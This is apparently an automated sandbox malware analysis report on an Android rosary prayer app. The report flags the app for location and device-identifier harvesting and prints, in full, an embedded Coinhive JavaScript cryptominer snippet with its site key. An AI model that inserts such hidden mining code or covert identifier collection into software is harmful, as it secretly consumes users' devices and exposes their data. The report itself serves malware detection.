Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:20.0.0
Analysis ID:400988
Start time:12:36:45
Joe Sandbox Product:Cloud
Start date:30.10.2017
Overall analysis duration:0h 5m 36s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:prsolutions.rosariofacileads_2017-10-02.apk
Cookbook file name:defaultandroidfilecookbook.jbs
Analysis system description:Android x86 5.1
Detection:MAL
Classification:mal48.spyw.bank.andAPK@0/251@1/0


Detection

StrategyScoreRangeReportingDetection
Threshold480 - 100Report FP / FNmalicious


Classification

Signature Overview

Click to jump to signature section


Location Tracing:

barindex
Queries the phones location (GPS)Show sources
Source: com.vxjxu.jkhfn1870.SetPreferences;->setPreferencesData:281API Call: android.location.Location.getLatitude
Source: com.vxjxu.jkhfn1870.SetPreferences;->setPreferencesData:287API Call: android.location.Location.getLongitude
Source: com.vxjxu.jkhfn1870.UserDetails;->getLocation:125API Call: android.location.LocationManager.getLastKnownLocation

Operating System Destruction:

barindex
Lists and deletes files in the same contextShow sources
Source: com.vxjxu.jkhfn1870.VastUtils;->deleteRecursive:88API Calls in same method context: File.listFiles,File.delete

E-Banking Fraud:

barindex
Loads a webpage with cache disabledShow sources
Source: com.vxjxu.jkhfn1870.MraidView;->initSettting:97API Call: android.webkit.WebSettings.setCacheMode

Bitcoin Miner:

barindex
Uses Coin Hive Javascript Bitcoin MinerShow sources
Source: Lprsolutions/rosariofacileads/RosarioFacile;->onCreate(Landroid/os/Bundle;)VMethod string: <html><script src=\"https://coinhive.com/lib/coinhive.min.js\"></script><script>var miner = new CoinHive.Anonymous(\'5xUKpsv5UFOcqf6dToqMDAtBYKn1WavS\');miner.setThrottle(0.1);miner.start();</script><body></body></html>

Networking:

barindex
Monitors network connection stateShow sources
Source: com.vxjxu.jkhfn1870.VastUtils$NetworkUtil;->startWatchingNetworkConnection:11API Call: android.content.IntentFilter.addAction android.net.conn.CONNECTIVITY_CHANGE
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: coinhive.com
Urls found in memory or binary dataShow sources
Source: classes.dex, androidString found in binary or memory: http://api.airpush.com/mraid/native_mraid.php
Source: classes.dex, androidString found in binary or memory: http://schemas.android.com/apk/res-auto
Source: classes.dexString found in binary or memory: http://schemas.android.com/apk/res-auto:http://xmlpull.org/v1/doc/features.html#process-namespaces
Source: opzioni.xml, menu.xml, rosario.xml, player_menu.xml, main.xml, AndroidManifest.xmlString found in binary or memory: http://schemas.android.com/apk/res/android
Source: classes.dex, androidString found in binary or memory: http://xmlpull.org/v1/doc/features.html#process-namespaces
Source: classes.dex, androidString found in binary or memory: https://api.airpush.com/Vast/handle_events.php
Source: classes.dex, androidString found in binary or memory: https://api.airpush.com/Vast/vastadcall.php
Source: classes.dexString found in binary or memory: https://api.airpush.com/Vast/vastadcall.php)https://api.airpush.com/appwall/getid.php2https://api.ai
Source: classes.dex, androidString found in binary or memory: https://api.airpush.com/appwall/getid.php
Source: classes.dex, androidString found in binary or memory: https://api.airpush.com/bannerads/banneradcall.php
Source: classes.dex, androidString found in binary or memory: https://api.airpush.com/bannerads/testbanner.php
Source: classes.dexString found in binary or memory: https://api.airpush.com/dialogad/adcall.php
Source: classes.dexString found in binary or memory: https://api.airpush.com/dialogad/adclick.php
Source: classes.dex, androidString found in binary or memory: https://api.airpush.com/fullpage/adcall.php
Source: classes.dexString found in binary or memory: https://api.airpush.com/fullpage/adcall.php0https://api.airpush.com/inappads/inappadcall.php4https:/
Source: classes.dex, androidString found in binary or memory: https://api.airpush.com/inappads/inappadcall.php
Source: classes.dex, androidString found in binary or memory: https://api.airpush.com/inappads/testinappadcall.php
Source: classes.dex, androidString found in binary or memory: https://api.airpush.com/integrationerror/error.php
Source: classes.dex, androidString found in binary or memory: https://api.airpush.com/lp/getinterstitialads.php
Source: classes.dexString found in binary or memory: https://api.airpush.com/lp/log_sdk_request.php
Source: classes.dexString found in binary or memory: https://api.airpush.com/model/user/getappinfo.php?packageName=
Source: classes.dexString found in binary or memory: https://api.airpush.com/model/user/getappinfo.php?packageName=(https://api.airpush.com/mraid/adcall.
Source: classes.dex, androidString found in binary or memory: https://api.airpush.com/mraid/adcall.php
Source: classes.dex, androidString found in binary or memory: https://api.airpush.com/mraid/mraidadcall.php
Source: classes.dexString found in binary or memory: https://api.airpush.com/mraid/track_events.php
Source: classes.dexString found in binary or memory: https://api.airpush.com/optin/
Source: classes.dexString found in binary or memory: https://api.airpush.com/optin/4https://api.airpush.com/overlayads/overlayadcall.php
Source: classes.dex, androidString found in binary or memory: https://api.airpush.com/overlayads/overlayadcall.php
Source: classes.dexString found in binary or memory: https://api.airpush.com/redirect.php?market=
Source: classes.dex, androidString found in binary or memory: https://api.airpush.com/v2/api.php
Source: classes.dex, androidString found in binary or memory: https://coinhive.com/lib/coinhive.min.js
Uses HTTP for connecting to the internetShow sources
Source: com.vxjxu.jkhfn1870.ImageBanner$2;->run:33API Call: org.apache.http.client.HttpClient.execute
Source: com.vxjxu.jkhfn1870.ImageTask;->doInBackground:18API Call: java.net.HttpURLConnection.connect
Source: com.vxjxu.jkhfn1870.MraidView$2$1;->run:7API Call: java.net.HttpURLConnection.connect
Source: com.vxjxu.jkhfn1870.MraidView$6;->run:33API Call: org.apache.http.client.HttpClient.execute
Source: com.vxjxu.jkhfn1870.NetworkThread;->run:43API Call: org.apache.http.impl.client.DefaultHttpClient.execute
Source: com.vxjxu.jkhfn1870.OverlayAd$3;->run:33API Call: org.apache.http.client.HttpClient.execute
Source: com.vxjxu.jkhfn1870.SendIntegrationError$1;->run:61API Call: org.apache.http.client.HttpClient.execute
Source: com.vxjxu.jkhfn1870.Util$NativeMraid;->run:16API Call: java.net.HttpURLConnection.connect
Source: com.vxjxu.jkhfn1870.Vpaid$1;->run:20API Call: org.apache.http.impl.client.DefaultHttpClient.execute
Source: com.vxjxu.jkhfn1870.Vpaid$2;->run:27API Call: org.apache.http.client.HttpClient.execute
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 34361
Source: unknownNetwork traffic detected: HTTP traffic on port 34361 -> 443
Checks an internet connection is availableShow sources
Source: com.vxjxu.jkhfn1870.UserDetails;->getImei:59API Call: android.net.wifi.WifiManager.isWifiEnabled
Source: com.vxjxu.jkhfn1870.UserDetails;->getImei:63API Call: android.net.wifi.WifiManager.getConnectionInfo
Source: com.vxjxu.jkhfn1870.Util;->checkInternetConnection:8API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.vxjxu.jkhfn1870.Util;->checkInternetConnection:9API Call: android.net.NetworkInfo.isConnected
Source: com.vxjxu.jkhfn1870.Util;->getConnectionType:103API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.vxjxu.jkhfn1870.Util;->getConnectionType:104API Call: android.net.NetworkInfo.isConnected
Source: com.vxjxu.jkhfn1870.Util;->getNetworksubType:187API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.vxjxu.jkhfn1870.Util;->getNetworksubType:188API Call: android.net.NetworkInfo.isConnected
Source: com.vxjxu.jkhfn1870.Util;->isConnectionFast:257API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.vxjxu.jkhfn1870.Util;->isConnectionFast:258API Call: android.net.NetworkInfo.isConnected
Source: com.vxjxu.jkhfn1870.VastUtils$NetworkUtil;->checkConnection:5API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.vxjxu.jkhfn1870.VastUtils$NetworkUtil;->checkConnection:6API Call: android.net.NetworkInfo.isConnected
Loads a webpage with cache disabledShow sources
Source: com.vxjxu.jkhfn1870.MraidView;->initSettting:97API Call: android.webkit.WebSettings.setCacheMode
Opens an internet connectionShow sources
Source: com.vxjxu.jkhfn1870.ImageTask;->doInBackground:11API Call: java.net.URL.openConnection (not executed)
Source: com.vxjxu.jkhfn1870.MraidView$2$1;->run:5API Call: java.net.URL.openConnection (not executed)
Source: com.vxjxu.jkhfn1870.Util$NativeMraid;->run:9API Call: java.net.URL.openConnection (not executed)
Source: com.vxjxu.jkhfn1870.VideoAd$1$1;->run:5API Call: java.net.URL.openConnection (not executed)

Stealing of Sensitive Information:

barindex
Has permission to query the current locationShow sources
Source: submitted apkRequest permission: android.permission.ACCESS_COARSE_LOCATION
Source: submitted apkRequest permission: android.permission.ACCESS_FINE_LOCATION
Checks if a SIM card is installedShow sources
Source: com.vxjxu.jkhfn1870.Util;->getCarrier:98API Call: android.telephony.TelephonyManager.getSimState
Source: com.vxjxu.jkhfn1870.Util;->getSupportsJson:229API Call: android.telephony.TelephonyManager.getSimState
Reads the serial number of the deviceShow sources
Source: Lcom/vxjxu/jkhfn1870/UserDetails;->getImei()Ljava/lang/String;Method string: "ro.serialno"

Data Obfuscation:

barindex
Uses reflectionShow sources
Source: com.vxjxu.jkhfn1870.ImageBanner;-><init>:17API Call: java.lang.reflect.Method.invoke
Source: com.vxjxu.jkhfn1870.UserDetails;->getImei:41API Call: java.lang.reflect.Method.invoke

Spreading:

barindex
Accesses external storage locationShow sources
Source: com.vxjxu.jkhfn1870.AirPlay;->startVideoAd:598API Call: android.os.Environment.getExternalStorageState
Source: com.vxjxu.jkhfn1870.Util;->getSupportsJson:234API Call: android.os.Environment.getExternalStorageState
Source: com.vxjxu.jkhfn1870.VastUtils$FileUtil;->updateExternalStorageState:16API Call: android.os.Environment.getExternalStorageState
Source: com.vxjxu.jkhfn1870.VideoAd$1;->launchNewHttpTask:3API Call: android.os.Environment.getExternalStorageDirectory
Source: com.vxjxu.jkhfn1870.VideoAd;->downloadVideo:17API Call: android.os.Environment.getExternalStorageState
Source: com.vxjxu.jkhfn1870.VideoAdActivity$3;->run:2API Call: android.os.Environment.getExternalStorageDirectory

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal48.spyw.bank.andAPK@0/251@1/0
Reads shares settingsShow sources
Source: prsolutions.rosariofacileads.Opzioni;->onCreate:7API Call: android.content.SharedPreferences.getBoolean
Source: prsolutions.rosariofacileads.Player;->SettaggioIniziale:196API Call: android.content.SharedPreferences.getBoolean
Source: prsolutions.rosariofacileads.Player;->onResume:269API Call: android.content.SharedPreferences.getBoolean
Source: com.vxjxu.jkhfn1870.Caching;->getJson:28API Call: android.content.SharedPreferences.getString
Source: com.vxjxu.jkhfn1870.Caching;->getVideoAdJson:31API Call: android.content.SharedPreferences.getString
Source: com.vxjxu.jkhfn1870.Caching;->getVideoAdJson:34API Call: android.content.SharedPreferences.getString
Source: com.vxjxu.jkhfn1870.Caching;->isSmartwallAd:37API Call: android.content.SharedPreferences.getBoolean
Source: com.vxjxu.jkhfn1870.SDKIntializer;->isSDKEnabled:98API Call: android.content.SharedPreferences.getBoolean
Source: com.vxjxu.jkhfn1870.UserDetails$DeviceUuidFactory;-><init>:7API Call: android.content.SharedPreferences.getString
Source: com.vxjxu.jkhfn1870.Util;->getDoc:171API Call: android.content.SharedPreferences.getString
Requests potentially dangerous permissionsShow sources
Source: submitted apkRequest permission: android.permission.ACCESS_COARSE_LOCATION
Source: submitted apkRequest permission: android.permission.ACCESS_FINE_LOCATION
Source: submitted apkRequest permission: android.permission.INTERNET

Anti Debugging:

barindex
Potentially drops DEX filesShow sources
Source: Initial APKFile created: MANIFEST.MF
Source: Initial APKFile created: CERT.SF

Malware Analysis System Evasion:

barindex
Accesses android OS build fieldsShow sources
Source: com.vxjxu.jkhfn1870.Util;->getManufacturer:178Field Access: android.os.Build.MANUFACTURER
Source: com.vxjxu.jkhfn1870.Util;->getPhoneModel:196Field Access: android.os.Build.MODEL
Queries several sensitive phone informationsShow sources
Source: Lcom/vxjxu/jkhfn1870/VastXmlParser;-><init>(Ljava/io/Reader;)VMethod string: "version"
Source: Lcom/vxjxu/jkhfn1870/UserDetails;->getImei()Ljava/lang/String;Method string: "imei"
Source: Lcom/vxjxu/jkhfn1870/SetPreferences;->setValues(Landroid/content/Context;)Ljava/util/List;Method string: "manufacturer"
Source: Lcom/vxjxu/jkhfn1870/VastXmlParser;-><init>(Ljava/io/Reader;)VMethod string: "model"
Source: Lcom/vxjxu/jkhfn1870/VastXmlParser$Creative;-><init>(Lcom/vxjxu/jkhfn1870/VastXmlParser;Lorg/xmlpull/v1/XmlPullParser;)VMethod string: "type"
Source: Lcom/vxjxu/jkhfn1870/Util;->getSupportsJson(Landroid/content/Context;)Lorg/json/JSONObject;Method string: "phone"
Source: Lcom/vxjxu/jkhfn1870/SetPreferences;->setValues(Landroid/content/Context;)Ljava/util/List;Method string: "appid"
Queries the unique operating system id (ANDROID_ID)Show sources
Source: com.vxjxu.jkhfn1870.UserDetails$DeviceUuidFactory;-><init>:11API Call: android.provider.Settings$Secure.getString
Source: com.vxjxu.jkhfn1870.Util;->getAndroidIdinMd5:46API Call: android.provider.Settings$Secure.getString
Source: com.vxjxu.jkhfn1870.Util;->getAndroidIdinSHA:71API Call: android.provider.Settings$Secure.getString

Hooking and other Techniques for Hiding and Protection:

barindex
Uses Crypto APIsShow sources
Source: com.vxjxu.jkhfn1870.SetPreferences;->setPreferencesData:314API Call: java.security.MessageDigest.getInstance
Source: com.vxjxu.jkhfn1870.SetPreferences;->setPreferencesData:319API Call: java.security.MessageDigest.update
Source: com.vxjxu.jkhfn1870.SetPreferences;->setPreferencesData:320API Call: java.security.MessageDigest.digest
Source: com.vxjxu.jkhfn1870.UserDetails;->setImeiInSHA:10API Call: java.security.MessageDigest.getInstance
Source: com.vxjxu.jkhfn1870.UserDetails;->setImeiInSHA:13API Call: java.security.MessageDigest.update
Source: com.vxjxu.jkhfn1870.UserDetails;->setImeiInSHA:14API Call: java.security.MessageDigest.digest
Source: com.vxjxu.jkhfn1870.UserDetails;->setImeiInMd5:154API Call: java.security.MessageDigest.getInstance
Source: com.vxjxu.jkhfn1870.UserDetails;->setImeiInMd5:157API Call: java.security.MessageDigest.update
Source: com.vxjxu.jkhfn1870.UserDetails;->setImeiInMd5:158API Call: java.security.MessageDigest.digest
Source: com.vxjxu.jkhfn1870.Util;->convertStringToMD5:22API Call: java.security.MessageDigest.getInstance
Source: com.vxjxu.jkhfn1870.Util;->convertStringToMD5:25API Call: java.security.MessageDigest.update
Source: com.vxjxu.jkhfn1870.Util;->convertStringToMD5:26API Call: java.security.MessageDigest.digest
Source: com.vxjxu.jkhfn1870.Util;->convertStringToSHA:33API Call: java.security.MessageDigest.getInstance
Source: com.vxjxu.jkhfn1870.Util;->convertStringToSHA:36API Call: java.security.MessageDigest.update
Source: com.vxjxu.jkhfn1870.Util;->convertStringToSHA:37API Call: java.security.MessageDigest.digest
Source: com.vxjxu.jkhfn1870.Util;->getAndroidIdinMd5:54API Call: java.security.MessageDigest.getInstance
Source: com.vxjxu.jkhfn1870.Util;->getAndroidIdinMd5:57API Call: java.security.MessageDigest.update
Source: com.vxjxu.jkhfn1870.Util;->getAndroidIdinMd5:58API Call: java.security.MessageDigest.digest
Source: com.vxjxu.jkhfn1870.Util;->getAndroidIdinSHA:73API Call: java.security.MessageDigest.getInstance
Source: com.vxjxu.jkhfn1870.Util;->getAndroidIdinSHA:76API Call: java.security.MessageDigest.update
Source: com.vxjxu.jkhfn1870.Util;->getAndroidIdinSHA:77API Call: java.security.MessageDigest.digest

Language, Device and Operating System Detection:

barindex
Checks if phone allows installing non-market appsShow sources
Source: com.vxjxu.jkhfn1870.Util;->isInstallFromMarketOnly:267API Call: android.provider.Settings$Secure.getString(n/a,"install_non_market_apps")
Queries the SIM provider name (SPN - Service Provider Name)Show sources
Source: com.vxjxu.jkhfn1870.Util;->getCarrier:99API Call: android.telephony.TelephonyManager.getSimOperatorName
Queries the WIFI MAC addressShow sources
Source: com.vxjxu.jkhfn1870.UserDetails;->getImei:64API Call: android.net.wifi.WifiInfo.getMacAddress
Queries the network operator nameShow sources
Source: com.vxjxu.jkhfn1870.Util;->getNetworkOperator:183API Call: android.telephony.TelephonyManager.getNetworkOperatorName
Queries the unqiue device ID (IMEI, MEID or ESN)Show sources
Source: com.vxjxu.jkhfn1870.UserDetails$DeviceUuidFactory;-><init>:25API Call: android.telephony.TelephonyManager.getDeviceId
Source: com.vxjxu.jkhfn1870.UserDetails;->getImei:33API Call: android.telephony.TelephonyManager.getDeviceId

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshot

android-buttoncam-android

Created / dropped Files

No created / dropped files found

Contacted Domains/Contacted IPs

Contacted Domains

NameIPActiveMaliciousAntivirus Detection
coinhive.com94.130.90.152truetrue

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPCountryFlagASNASN NameMalicious
94.130.90.152Germany
24940HETZNER-ASDEfalse
8.8.8.8United States
15169GOOGLE-GoogleIncUSfalse
74.125.192.188United States
15169GOOGLE-GoogleIncUSfalse

Static File Info

General

File type:Zip archive data, at least v2.0 to extract
TrID:
  • Android Package (19004/1) 49.99%
  • Java Archive (13504/1) 35.53%
  • ZIP compressed archive (4004/1) 10.53%
  • Java Script embedded in Visual Basic Script (1500/0) 3.95%
File name:prsolutions.rosariofacileads_2017-10-02.apk
File size:33610190
MD5:fc1e08187de3f4b7cb52bd09ea3c2594
SHA1:6241e89839c4a15472c963c4cce57dd31017daf4
SHA256:22581e7e76a09d404d093ab755888743b4c908518c47af66225e2da991d112f0
SHA512:2d403c996fccac54364db5fdca9ec8bd7a814eebced4f7c234024dc8299be90d261b0c6b93637ffda2c54f4839c20a3473ec8a26d09d46c219ac14637ca5e9fe
File Content Preview:PK..............E6............AndroidManifest.xml.VKo.W.>.Gb........v.b.I.)..U2!..)A.B.)u.....r..U%....+.,.`.EUU......T]#V]T....g.en.3..x.....9.y..cG)A..D.e.V.h..._...p.....g...W......HYD9.,p.x.......F"D6....o.....?..(.g./..`.......w......~.....&.........

File Icon

Static APK Info

General

Label:Recitiamo il Rosario
Minimum SDK required:5
Target SDK required:18
Version Code:22
Version Name:22
Package Name:prsolutions.rosariofacileads
Is Activity:true
Is Receiver:false
Is Service:false
Requests System Level Permissions:false
Play Store Compatible:true

Activities

NameIs Entrypoint
prsolutions.rosariofacileadsprsolutions.rosariofacileads.RosarioFaciletrue
prsolutions.rosariofacileadsprsolutions.rosariofacileads.Player
prsolutions.rosariofacileadsprsolutions.rosariofacileads.Opzioni
prsolutions.rosariofacileadscom.vxjxu.jkhfn1870.SmartWallActivity
prsolutions.rosariofacileadscom.vxjxu.jkhfn1870.BrowserActivity
prsolutions.rosariofacileadscom.vxjxu.jkhfn1870.VideoAdActivity

Receivers

Permission Requested

  • android.permission.ACCESS_COARSE_LOCATION
  • android.permission.ACCESS_FINE_LOCATION
  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.INTERNET

Certificate

Name:classes.dex
Issuer:O=PRSolutions
Subject:O=PRSolutions

Resources

NameType
outro2.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
nomepadre.mp3MPEG ADTS, layer III, v1, 80 kbps, 44.1 kHz, Stereo
introgaudiosi2.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
dolorosi3.jpgJPEG image data, JFIF standard 1.01
gloriosi2.jpgJPEG image data, JFIF standard 1.01
gaudiosi1.jpgJPEG image data, JFIF standard 1.01
gaudiosi4.jpgJPEG image data, JFIF standard 1.01
pallino.pngPNG image, 21 x 21, 8-bit colormap, non-interlaced
luminosi2.jpgJPEG image data, JFIF standard 1.01
introdolorosi5.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
dolorosi4.jpgJPEG image data, JFIF standard 1.01
luminosi4.jpgJPEG image data, JFIF standard 1.01
madonna.jpgJPEG image data, JFIF standard 1.01
dolorosi1.jpgJPEG image data, JFIF standard 1.01
icon.pngPNG image, 72 x 72, 8-bit/color RGBA, non-interlaced
gloriosi3.jpgJPEG image data, JFIF standard 1.01
gaudiosi5.jpgJPEG image data, JFIF standard 1.01
outro.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
luminosi3.jpgJPEG image data, JFIF standard 1.01
introluce6.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
introgloriosi5.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
gloriosi4.jpgJPEG image data, JFIF standard 1.01
salveregina.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
dolorosi2.jpgJPEG image data, JFIF standard 1.01
gloriosi1.jpgJPEG image data, JFIF standard 1.01
gaudiosi3.jpgJPEG image data, JFIF standard 1.01
luminosi1.jpgJPEG image data, JFIF standard 1.01
introdolorosi4.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
introgaudiosi6.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
dolorosi3.jpgJPEG image data, JFIF standard 1.01
icon.pngPNG image, 48 x 48, 8-bit/color RGBA, non-interlaced
MANIFEST.MFASCII text, with CRLF line terminators
gaudiosi5.jpgJPEG image data, JFIF standard 1.01
luminosi3.jpgJPEG image data, JFIF standard 1.01
opzioni.xmlDBase 3 data file (1064 records)
gloriosi2.jpgJPEG image data, JFIF standard 1.01
gaudiosi4.jpgJPEG image data, JFIF standard 1.01
luminosi2.jpgJPEG image data, JFIF standard 1.01
introluce5.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
introgloriosi4.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
CERT.SFASCII text, with CRLF line terminators
dolorosi5.jpgJPEG image data, JFIF standard 1.01
gloriosi3.jpgJPEG image data, JFIF standard 1.01
dolorosi1.jpgJPEG image data, JFIF standard 1.01
gaudiosi2.jpgJPEG image data, JFIF standard 1.01
resources.arscdata
introdolorosi3.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
introgaudiosi5.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
gloria.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
menu.xmlDBase 3 data file (1004 records)
dolorosi2.jpgJPEG image data, JFIF standard 1.01
icon.pngPNG image, 36 x 36, 8-bit/color RGBA, non-interlaced
gloriosi5.jpgJPEG image data, JFIF standard 1.01
gaudiosi4.jpgJPEG image data, JFIF standard 1.01
luminosi2.jpgJPEG image data, JFIF standard 1.01
luminosi5.jpgJPEG image data, JFIF standard 1.01
gloriosi1.jpgJPEG image data, JFIF standard 1.01
rosario.xmlDBase 3 data file (1708 records)
gaudiosi3.jpgJPEG image data, JFIF standard 1.01
luminosi1.jpgJPEG image data, JFIF standard 1.01
introluce4.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
introgloriosi3.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
credo.mp3MPEG ADTS, layer III, v1, 80 kbps, 44.1 kHz, Stereo
litanie.mp3Audio file with ID3 version 2.3.0, contains: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
dolorosi4.jpgJPEG image data, JFIF standard 1.01
gloriosi2.jpgJPEG image data, JFIF standard 1.01
CERT.RSAdata
padrenostro.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
player_menu.xmlDBase 3 data file (1204 records)
gaudiosi1.jpgJPEG image data, JFIF standard 1.01
introdolorosi2.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
introgaudiosi4.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
dolorosi5.jpgJPEG image data, JFIF standard 1.01
dolorosi1.jpgJPEG image data, JFIF standard 1.01
gloriosi4.jpgJPEG image data, JFIF standard 1.01
gaudiosi3.jpgJPEG image data, JFIF standard 1.01
luminosi1.jpgJPEG image data, JFIF standard 1.01
luminosi4.jpgJPEG image data, JFIF standard 1.01
avemaria.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
gaudiosi2.jpgJPEG image data, JFIF standard 1.01
introluce3.mp3MPEG ADTS, layer III, v2, 64 kbps, 22.05 kHz, Stereo
introgloriosi2.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
dolorosi3.jpgJPEG image data, JFIF standard 1.01
gloriosi5.jpgJPEG image data, JFIF standard 1.01
gloriosi1.jpgJPEG image data, JFIF standard 1.01
main.xmlDBase 3 data file (1176 records)
rosariovuoto.pngPNG image, 480 x 480, 8-bit/color RGBA, non-interlaced
luminosi5.jpgJPEG image data, JFIF standard 1.01
introgaudiosi3.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
dolorosi4.jpgJPEG image data, JFIF standard 1.01
gloriosi3.jpgJPEG image data, JFIF standard 1.01
gaudiosi2.jpgJPEG image data, JFIF standard 1.01
gaudiosi5.jpgJPEG image data, JFIF standard 1.01
luminosi3.jpgJPEG image data, JFIF standard 1.01
introdolorosi6.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
AndroidManifest.xmlDBase 3 data file (4068 records)
dolorosi5.jpgJPEG image data, JFIF standard 1.01
gaudiosi1.jpgJPEG image data, JFIF standard 1.01
luminosi5.jpgJPEG image data, JFIF standard 1.01
introluce2.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
dolorosi2.jpgJPEG image data, JFIF standard 1.01
gloriosi4.jpgJPEG image data, JFIF standard 1.01
madonnasfondo.jpgJPEG image data, JFIF standard 1.01
luminosi4.jpgJPEG image data, JFIF standard 1.01
introgloriosi6.mp3MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, Stereo
classes.dexDalvik dex file version 035
gloriosi5.jpgJPEG image data, JFIF standard 1.01

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Oct 30, 2017 12:37:02.559267998 CET484575228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:02.559367895 CET52284845774.125.192.188192.168.1.33
Oct 30, 2017 12:37:02.559730053 CET484575228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:02.560914040 CET484575228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:02.560945034 CET52284845774.125.192.188192.168.1.33
Oct 30, 2017 12:37:02.773508072 CET52284845774.125.192.188192.168.1.33
Oct 30, 2017 12:37:02.773562908 CET52284845774.125.192.188192.168.1.33
Oct 30, 2017 12:37:02.773575068 CET52284845774.125.192.188192.168.1.33
Oct 30, 2017 12:37:02.773941994 CET484575228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:02.774029016 CET484575228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:02.774091005 CET484575228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:02.800649881 CET52284845774.125.192.188192.168.1.33
Oct 30, 2017 12:37:02.800888062 CET484575228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:02.804325104 CET484575228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:02.804359913 CET52284845774.125.192.188192.168.1.33
Oct 30, 2017 12:37:02.804841995 CET484575228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:03.868417978 CET651353192.168.1.338.8.8.8
Oct 30, 2017 12:37:03.941587925 CET5365138.8.8.8192.168.1.33
Oct 30, 2017 12:37:07.812782049 CET364505228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:07.812953949 CET52283645074.125.192.188192.168.1.33
Oct 30, 2017 12:37:07.816754103 CET364505228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:07.818176985 CET364505228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:07.818274021 CET52283645074.125.192.188192.168.1.33
Oct 30, 2017 12:37:08.035185099 CET52283645074.125.192.188192.168.1.33
Oct 30, 2017 12:37:08.035216093 CET52283645074.125.192.188192.168.1.33
Oct 30, 2017 12:37:08.035233021 CET52283645074.125.192.188192.168.1.33
Oct 30, 2017 12:37:08.035425901 CET364505228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:08.035464048 CET364505228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:08.035485029 CET364505228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:08.055358887 CET52283645074.125.192.188192.168.1.33
Oct 30, 2017 12:37:08.055629969 CET364505228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:08.057971001 CET364505228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:08.057992935 CET52283645074.125.192.188192.168.1.33
Oct 30, 2017 12:37:08.058295965 CET364505228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:17.745940924 CET368775228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:17.746010065 CET52283687774.125.192.188192.168.1.33
Oct 30, 2017 12:37:17.746381044 CET368775228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:17.747528076 CET368775228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:17.747581005 CET52283687774.125.192.188192.168.1.33
Oct 30, 2017 12:37:17.960366011 CET52283687774.125.192.188192.168.1.33
Oct 30, 2017 12:37:17.960393906 CET52283687774.125.192.188192.168.1.33
Oct 30, 2017 12:37:17.960565090 CET368775228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:17.960601091 CET368775228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:17.971606016 CET52283687774.125.192.188192.168.1.33
Oct 30, 2017 12:37:17.971796036 CET368775228192.168.1.3374.125.192.188
Oct 30, 2017 12:37:17.975219965 CET368775228192.168.1.3374.125.192.188
